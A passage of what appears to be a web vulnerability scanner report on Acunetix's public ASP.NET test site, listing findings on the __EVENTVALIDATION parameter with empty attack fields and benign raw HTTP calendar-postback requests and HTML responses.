their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8561&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAUqJFadsIZGRkA3QhMjKmutvbYYov2%2BYRW%2B5Dv%2FE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKs3N33CgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMOTJxPu%2BzRS%2FH9GYIednJC9d%2FT%2Fo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:21 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAUqJFadsIZGRkA3QhMjKmutvbYYov2+YRW+5Dv/E=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKs3N33CgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMOTJxPu+zRS/H9GYIednJC9d/T/o=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:White" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8340&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBABwWcu9oIZGRk4mSqKRIND%2FP6yec%2BzLPNb0pG%2B5Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKs8a6eDwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2BvYXwXe7fispYS4SKQyywy0qmXa
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:38 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBABwWcu9oIZGRk4mSqKRIND/P6yec+zLPNb0pG+5Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKs8a6eDwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+vYXwXe7fispYS4SKQyywy0qmXa" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:White" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It 